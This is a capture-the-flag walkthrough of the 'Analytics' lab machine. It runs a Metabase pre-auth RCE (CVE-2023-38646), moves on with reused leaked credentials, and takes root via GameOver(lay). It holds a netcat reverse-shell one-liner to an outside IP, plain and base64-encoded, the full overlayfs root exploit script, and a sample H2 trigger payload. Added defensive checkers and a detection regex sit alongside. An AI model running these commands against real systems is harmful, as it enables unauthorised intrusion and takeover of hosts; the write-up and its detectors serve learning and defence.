Analytics

Target IP: 10.129.229.224
Challenge Description: N/A.


Reconnaissance

[Screenshot: nmap -sS full TCP port scan against 10.129.229.224]
A full TCP port scan with sudo nmap -sS 10.129.229.224 -p- returns the result shown above. Two TCP ports are open on the target: SSH (22) and HTTP (80), both on their standard ports.

[Screenshot: nmap -sV -A service and script scan of ports 22 and 80]
I then ran an aggressive scan, sudo nmap -sV -A 10.129.229.224 -p 22,80, against the two open ports and got the result shown above. The HTTP scan reveals the hostname analytical.htb, so I need to add it to /etc/hosts before enumerating the web server.

[Screenshot: ffuf virtual-host fuzzing against analytical.htb, revealing data.analytical.htb]
I added analytical.htb to my /etc/hosts file. Then I fuzzed for virtual hosts with ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.analytical.htb" -u http://analytical.htb -fs 154, where -fs 154 hides the 154-byte response the server returns for unknown hosts, so only hosts that answer differently are listed. That revealed the subdomain data, as shown above. I added data.analytical.htb to /etc/hosts as well. Time to begin with enumeration now :)


Enumeration

Port 80: HTTP (analytical.htb)
[Screenshot: landing page of http://analytical.htb]
The page above is served on port 80. A directory search turned up nothing useful; the site is mostly static. However, the Login button redirects to http://data.analytical.htb.

Port 80: HTTP (data.analytical.htb)
[Screenshot: Metabase login page at http://data.analytical.htb]
The page above is served for data.analytical.htb: the target is running the Metabase application here. It asks for an email and password, and I have no credentials yet. Time to enumerate further.

[Screenshot: page source showing the Metabase version string v0.46.6]
Reading the page source, I found the application version v0.46.6, as shown above. Is the target really running Metabase v0.46.6, and does that version have known vulnerabilities? Time to find out.

[Screenshot: search result describing the unauthenticated RCE in Metabase 0.46.6]
Searching Google for Metabase v0.46.6 vulnerabilities, I found the page shown above. This version is vulnerable to remote code execution without authentication, so if the target really runs it I can get RCE without any credentials. A quick way to confirm the version is the unauthenticated endpoint /api/session/properties, which reports the running release (and, on affected builds, still hands out the setup token that the attack relies on).
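
Before firing an exploit it is worth confirming the version from the API rather than from the page source. The snippet below is an added example (not from the writeup or from any exploit repository): it reads GET /api/session/properties, which Metabase serves without a session, compares the reported version against the fixed releases named in the vendor advisory, and reports whether a setup token is still being handed out. The sample responses are constructed and the token value is made up; fetch_properties is the only part that touches the network.

```python
"""Exposure check for Metabase CVE-2023-38646 (added example, not from the writeup)."""
import json
import re
import urllib.request

# First fixed release of each affected line, as listed in Metabase's advisory.
# Open-source builds are 0.x, Enterprise builds are 1.x with the same minor numbers.
FIXED = {
    (0, 46): (0, 46, 6, 1), (1, 46): (1, 46, 6, 1),
    (0, 45): (0, 45, 4, 1), (1, 45): (1, 45, 4, 1),
    (0, 44): (0, 44, 7, 1), (1, 44): (1, 44, 7, 1),
    (0, 43): (0, 43, 7, 2), (1, 43): (1, 43, 7, 2),
}


def parse_version(tag):
    """'v0.46.6' -> (0, 46, 6); tuples compare correctly even against a 4-part fix tag."""
    m = re.match(r"v?(\d+(?:\.\d+)+)", tag.strip())
    if not m:
        raise ValueError("unrecognised Metabase version tag: %r" % tag)
    return tuple(int(p) for p in m.group(1).split("."))


def is_vulnerable_version(tag):
    """True if the version predates the fix for its release line."""
    v = parse_version(tag)
    line = v[:2]
    if line in FIXED:
        return v < FIXED[line]
    # x.47 and later shipped after the fix; lines older than x.43 never received a backport.
    return line[1] < 43


def assess_properties(body):
    """Evaluate the JSON from GET /api/session/properties (reachable without a session).

    Affected builds keep returning 'setup-token' after installation has finished; that
    token is what lets an unauthenticated caller reach /api/setup/validate.
    """
    props = json.loads(body)
    tag = props["version"]["tag"]
    return {
        "version": tag,
        "vulnerable_version": is_vulnerable_version(tag),
        "setup_token_exposed": props.get("setup-token") is not None,
    }


def fetch_properties(base_url, timeout=10):
    """Retrieve the live properties document from a Metabase instance."""
    req = urllib.request.Request(base_url.rstrip("/") + "/api/session/properties",
                                 headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed responses shaped like the real endpoint; the token value is made up.
SAMPLE_VULNERABLE = json.dumps({
    "version": {"tag": "v0.46.6"},
    "setup-token": "11111111-2222-3333-4444-555555555555",
})
SAMPLE_PATCHED = json.dumps({
    "version": {"tag": "v0.46.6.1"},
    "setup-token": None,
})

if __name__ == "__main__":
    import sys
    body = fetch_properties(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_VULNERABLE
    print(json.dumps(assess_properties(body), indent=2))
```

Run it with the base URL (python3 check.py http://data.analytical.htb) to test a live instance; without an argument it evaluates the constructed vulnerable sample. A non-null setup token on an instance whose setup is already complete is the actual pre-auth foothold, so that field matters as much as the version string.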


Exploitation

[Screenshot: GitHub repository with the CVE-2023-38646 exploit]
I searched for public exploits for this vulnerability and found the GitHub repository shown above. The vulnerability is tracked as CVE-2023-38646: the leaked setup token lets an unauthenticated request to /api/setup/validate supply an attacker-controlled H2 JDBC connection string, and the H2 driver executes code embedded in that string when it opens the connection. The repository documents how to use the exploit. I copied it to my machine as exp.py. Time to test it now.

[Screenshot: exploit execution (top) and the port 8443 listener catching the reverse shell as metabase (bottom)]
To run the exploit I opened two terminals, as shown above: the top one runs the exploit, the bottom one runs a listener on port 8443 to catch the reverse shell. First I started the listener on port 8443. Then I base64-encoded the reverse-shell payload

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.139 8443 >/tmp/f

which gives

cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m

The exploit takes the encoded command through its -x option, so I ran

python3 exp.py -x cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m http://data.analytical.htb

and immediately received a reverse shell as the user metabase, as shown above.
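
What that exploit looks like on the wire is what a defender needs. The following is an added example written for this page (not the PoC's code): it scans Metabase API requests for the pattern CVE-2023-38646 depends on, a POST to /api/setup/validate whose H2 connection string carries a CREATE TRIGGER ... $$ ... $$ block of code, and also treats any use of the setup endpoint on an already-installed instance as suspicious. The request records are constructed, the token is a placeholder, and the indicator list is mine, based on the public exploitation technique.

```python
"""Flag CVE-2023-38646 exploitation attempts in Metabase API request logs.
Added example for this writeup; not part of the page or of the exploit repository."""
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

SETUP_VALIDATE = "/api/setup/validate"

# Tokens that have no business inside a JDBC URL submitted by the setup wizard.
# The public exploit smuggles an H2 "CREATE TRIGGER ... AS $$ <code> $$" into the
# connection string so the driver compiles and runs it when the connection opens.
H2_PAYLOAD = re.compile(
    r"CREATE\s+TRIGGER|INIT\s*=|RUNSCRIPT|\$\$|java\.lang\.Runtime|ProcessBuilder",
    re.IGNORECASE,
)


@dataclass
class Alert:
    request_no: int
    reason: str
    db_url: str


def extract_h2_target(body: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (engine, connection string) from a validate request body, or (None, None)."""
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return None, None
    if not isinstance(data, dict):
        return None, None
    details = data.get("details") or {}
    inner = details.get("details") or {}
    return details.get("engine"), inner.get("db")


def scan(requests: Iterable[Tuple[str, str, str]], setup_completed: bool = True) -> List[Alert]:
    """requests: (method, path, body) in arrival order.

    setup_completed=True means the instance is already installed, in which case any
    call to the setup endpoint is itself suspicious, payload or not.
    """
    alerts = []
    for no, (method, path, body) in enumerate(requests, 1):
        if method.upper() != "POST" or path.split("?", 1)[0] != SETUP_VALIDATE:
            continue
        engine, db = extract_h2_target(body)
        if db and H2_PAYLOAD.search(db):
            alerts.append(Alert(no, "code payload in H2 connection string", db))
        elif setup_completed:
            alerts.append(Alert(no, "setup validation on an installed instance", db or ""))
    return alerts


# Constructed traffic, not captured from the target. The third request mimics the
# shape of the public exploit; the token is a placeholder value.
SAMPLE_REQUESTS = [
    ("GET", "/api/session/properties", ""),
    ("POST", "/api/session", json.dumps({"username": "user@example.com", "password": "x"})),
    ("POST", SETUP_VALIDATE, json.dumps({
        "token": "00000000-0000-0000-0000-000000000000",
        "details": {"engine": "h2", "name": "x", "details": {"db":
            "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;"
            "CREATE TRIGGER pwn BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
            "java.lang.Runtime.getRuntime().exec('id')$$--=x"}},
    })),
    ("POST", SETUP_VALIDATE, json.dumps({
        "token": "00000000-0000-0000-0000-000000000000",
        "details": {"engine": "postgres", "name": "dw", "details": {"db": "warehouse"}},
    })),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_REQUESTS):
        print("request %d: %s: %s" % (a.request_no, a.reason, a.db_url[:60]))
```

The second rule is the one that survives payload obfuscation: once an instance has finished setup, nothing legitimate calls /api/setup/validate any more, so the presence of the request is enough to page on, and the regex only adds the "what" to the alert.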


Privilege Escalation

[Screenshot: printenv output inside the container showing META_PASS]
I ran printenv and obtained the result shown above. The environment variable META_PASS holds the password An4lytics_ds20223# for the user metalytics. This shell is running inside a Docker container, which is why I have so little control over the target machine from it (the presence of /.dockerenv is the usual tell). Maybe I can access the web application with these new credentials?

[Screenshot: logged in to Metabase with the recovered credentials; user Johnny listed]
With those credentials I logged in to the web application. There is an unusual user named Johnny. Is this user an administrator of the web application?

[Screenshot: Metabase admin view showing the logged-in user is an administrator]
After some manual enumeration of the web application, I noticed that this user is an admin, as shown above. I looked for other attack vectors that would give me a higher-privilege reverse shell (consoles for command execution, pages to upload a web shell, and so on), but had no luck. SSH is open on port 22. Maybe the same credentials are reused on the host: ssh metalytics@analytical.htb with the password An4lytics_ds20223#?

[Screenshot: SSH login as metalytics]
And it worked. I now have an SSH session as the user metalytics on the target machine itself, outside the container. The credentials left in the container's environment were reused for a host account, which gave me a horizontal move from the container's metabase user to the host's metalytics user.

[Screenshot: kernel 6.2.0-25-generic and Ubuntu 22.04.3 LTS on the target]
The target is running kernel 6.2.0-25-generic on Ubuntu 22.04.3 LTS. From previous knowledge, I know this kernel is vulnerable to GameOver(lay) (CVE-2023-2640 and CVE-2023-32629), an Ubuntu-specific overlayfs flaw: inside an unprivileged user namespace, file capabilities set on a lower-layer file are copied up to the upper layer without being scoped to that namespace, so the copied binary carries the capability in the host's namespace.

[Screenshot: GitHub repository with the GameOver(lay) exploit script]
I found the GitHub repository shown above for this vulnerability and copied its script to the target machine for privilege escalation.

[Screenshot: exp.sh copied to /tmp, made executable and run, yielding a root shell]
In /tmp I saved the script as exp.sh, made it executable and ran it, which gave me a root shell, as shown above. Now I have root access on the target machine :) The content of the script is shown below:

#!/bin/bash

# CVE-2023-2640 CVE-2023-32629: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023
# (The original header writes the second ID as CVE-2023-3262; the assigned identifier is CVE-2023-32629.)

echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"

# Inside a fresh user+mount namespace (where we are "root"): stage python3 as the lower
# layer, give it cap_setuid, mount an overlay over it and touch the merged file to force
# a copy-up. The vulnerable kernel copies the capability xattr into the upper dir without
# scoping it to the namespace, so u/python3 carries cap_setuid in the real (init) namespace.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
# Back outside the namespace: setuid(0) succeeds, a setuid-root copy of bash is dropped and
# run with -p (keep privileges); the staging dirs and the copy are removed when that shell exits.
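
The one-liner only works when three things hold at once. The script below is an added example (not the writeup's or g1vi's code) that checks them from the host side: whether unprivileged user namespaces are permitted (the kernel.unprivileged_userns_clone sysctl and, on newer Ubuntu releases, kernel.apparmor_restrict_unprivileged_userns), whether overlayfs is registered, and how the running kernel's ABI number compares with the patched one from the applicable Ubuntu Security Notice, which you supply as patched_abi. Function names and the sample inputs are mine.

```python
"""Check the preconditions GameOver(lay) (CVE-2023-2640, CVE-2023-32629) depends on.
Added example for this writeup; not part of the page or of g1vi's script."""
import os
import re
from pathlib import Path
from typing import Optional


def kernel_abi(release: str):
    """'6.2.0-25-generic' -> ((6, 2, 0), 25, 'generic').

    Ubuntu fixes ship as a new ABI number for the same upstream version, so the ABI
    (here 25) is what to compare against the Ubuntu Security Notice for your flavour.
    """
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)-(\d+)-([\w-]+)$", release.strip())
    if not m:
        raise ValueError("not an Ubuntu kernel release string: %r" % release)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))), int(m.group(4)), m.group(5)


def read_sysctl(name: str) -> Optional[int]:
    """Read an integer sysctl via /proc/sys; None if the knob does not exist on this kernel."""
    try:
        return int((Path("/proc/sys") / name.replace(".", "/")).read_text().strip())
    except (OSError, ValueError):
        return None


def overlay_listed() -> bool:
    """True if overlayfs is currently registered (a module may still be autoloadable)."""
    try:
        lines = Path("/proc/filesystems").read_text().splitlines()
    except OSError:
        return False
    return any(line.split()[-1] == "overlay" for line in lines if line.strip())


def assess(release: str, userns_clone: Optional[int], overlay: bool,
           apparmor_restrict: Optional[int] = None, patched_abi: Optional[int] = None) -> dict:
    """Combine the observations into a verdict.

    The exploit needs (a) an unprivileged user+mount namespace (unshare -rm), which
    kernel.unprivileged_userns_clone=0 or apparmor_restrict_unprivileged_userns=1 denies,
    (b) overlayfs mountable inside it, and (c) a kernel ABI older than the fixed one.
    A missing knob (None) is treated as "not restricting", which is the upstream default.
    """
    version, abi, flavour = kernel_abi(release)
    userns_ok = userns_clone != 0 and apparmor_restrict != 1
    result = {
        "kernel": version, "abi": abi, "flavour": flavour,
        "unprivileged_userns": userns_ok,
        "overlay_fs": overlay,
        "kernel_patched": None if patched_abi is None else abi >= patched_abi,
    }
    result["exploitable"] = userns_ok and overlay and result["kernel_patched"] is not True
    return result


if __name__ == "__main__":
    try:
        live = assess(os.uname().release,
                      read_sysctl("kernel.unprivileged_userns_clone"),
                      overlay_listed(),
                      read_sysctl("kernel.apparmor_restrict_unprivileged_userns"))
    except ValueError as exc:
        raise SystemExit(exc)
    for key, value in live.items():
        print("%-20s %s" % (key, value))
```

Setting kernel.unprivileged_userns_clone=0 is the stop-gap that breaks the unshare -rm step until the kernel is updated, at the cost of rootless containers and anything else that relies on user namespaces; the real fix is the patched kernel ABI.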

Flags

[Screenshot: user and root flags]
The two flags are shown above.